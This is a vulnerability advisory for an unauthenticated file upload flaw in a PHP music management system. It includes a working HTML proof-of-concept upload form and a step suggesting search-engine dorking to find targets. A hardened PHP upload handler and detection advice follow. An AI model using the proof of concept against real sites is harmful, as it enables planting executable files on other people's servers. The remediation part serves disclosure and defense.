=============================================================================================================================================
| # Title     : Simple Music Management System v1.0 Remote File Upload Vulnerability                                                        |
| # Author    : indoushka                                                                                                                    |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                             |
| # Vendor    : https://www.kashipara.com/project/php/12978/music-management-system-in-php-php-project-source-code                            |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.
[+] The following html code uploads an executable malicious file remotely.
[+] Go to line 27 (the "url:" line of the $.ajax call).
[+] Set the target site link, save changes and apply.
[+] Save the code as poc.html.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Music Upload Form</title>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
</head>

<body>
    <form id="manage-music" enctype="multipart/form-data">
        <label for="cover-input">Cover:</label>
        <input type="file" id="cover-input" name="cover" onchange="displayImgCover(this)">
        <br>
        <img id="cover" src="#" alt="Cover Preview" style="max-width: 200px; display:none;">
        <br>
        <input type="submit" value="Upload">
    </form>

    <script>

        // Handle form submission with AJAX
        $('#manage-music').submit(function(e){
            e.preventDefault();
            start_load(); // Placeholder for loader function
            $.ajax({
                url: 'http://127.0.0.1/music/ajax.php?action=save_music',
                data: new FormData($(this)[0]),
                cache: false,
                contentType: false,
                processData: false,
                method: 'POST',
                type: 'POST',
                success: function(resp) {
                    if (resp == 1) {
                        alert_toast('Data successfully saved', "success");
                        setTimeout(function(){
                            end_load(); // Placeholder to stop loader
                            _redirect('http://127.0.0.1/music/index.php?page=music_list'); // Redirect to music list page
                        }, 2000);
                    }
                }
            });
        });

        // Function to display the selected image (cover preview)
        function displayImgCover(input) {
            if (input.files && input.files[0]) {
                var reader = new FileReader();
                reader.onload = function (e) {
                    $('#cover').attr('src', e.target.result).show(); // Show the image preview
                };
                reader.readAsDataURL(input.files[0]);
            }
        }

        // Placeholder functions for loader and redirect
        function start_load(){
            console.log("Loading started..."); // Add your loading spinner code here
        }

        function end_load(){
            console.log("Loading finished."); // Add your code to stop the loading spinner here
        }

        function alert_toast(message, type){
            alert(message); // Basic alert, replace with a toast library if needed
        }

        function _redirect(url){
            window.location.href = url;
        }
    </script>
</body>
</html>

[+] Uploaded file (example result): http://127.0.0.1/music/assets/uploads/1726232340_hacked.txt

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
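The advisory shows that ajax.php?action=save_music accepts the "cover" field from an unauthenticated caller and stores whatever file it receives under assets/uploads/ with a timestamp-prefixed name. The following is an added example, written for this page and not the vendor's code, of how a hardened replacement for that upload step would look in PHP. It assumes the upload field is still named "cover", that files live under assets/uploads/, and that the application marks a logged-in user with $_SESSION['login_id']; those names are assumptions, not taken from the project.

```php
<?php
// Added example (not the vendor's code): hardened cover-image upload for an
// endpoint like ajax.php?action=save_music.
// Assumed names: upload field "cover", directory assets/uploads/,
// session flag $_SESSION['login_id'] for an authenticated user.

declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/assets/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;

// Allowlist: MIME type detected from file CONTENT => extension we assign ourselves.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate an entry of $_FILES and store it. Returns the server-side filename,
 * or throws a RuntimeException describing why the upload was rejected.
 */
function save_cover(array $file): string
{
    // 1. Require an authenticated user. The vulnerable endpoint has no such check,
    //    which is why a remote poc.html can post to it directly.
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['login_id'])) {
        throw new RuntimeException('authentication required');
    }

    // 2. Reject transport-level errors, oversized files and anything that did not
    //    arrive through PHP's upload mechanism.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error ' . (string) $file['error']);
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }

    // 3. Decide the type from the bytes on disk, never from the client-supplied
    //    filename or Content-Type header (both are attacker-controlled).
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('disallowed file type ' . $mime);
    }
    // Belt and braces: the image parser must also accept it.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }

    // 4. Generate the stored name ourselves so the original filename (and any
    //    path segments or double extensions in it) never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = UPLOAD_DIR . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable by the web server, never executable
    return $name;
}

// Usage inside the action dispatcher (the original replies "1" on success):
// if (($_GET['action'] ?? '') === 'save_music') {
//     try {
//         $cover = save_cover($_FILES['cover'] ?? []);
//         echo 1;
//     } catch (RuntimeException $e) {
//         http_response_code(400);
//         echo $e->getMessage();
//     }
// }
```

Two points of the design matter beyond the code itself. First, the authentication check is the fix for the "remote" part of the advisory: without it, every other check only narrows what an anonymous caller can store. Second, the upload directory should be served with script execution disabled regardless of validation (for Apache, `php_flag engine off` in that directory's configuration; for nginx, a location block for assets/uploads/ that is never passed to php-fpm), so that a file which slips past the content check is still delivered as data rather than run. On the detection side, the timestamp-prefixed names in the advisory's result URL (1726232340_hacked.txt) are what the vulnerable version produces, so new files in assets/uploads/ that are not valid images, or POSTs to ajax.php?action=save_music without an accompanying session cookie, are reasonable things to alert on in web server logs.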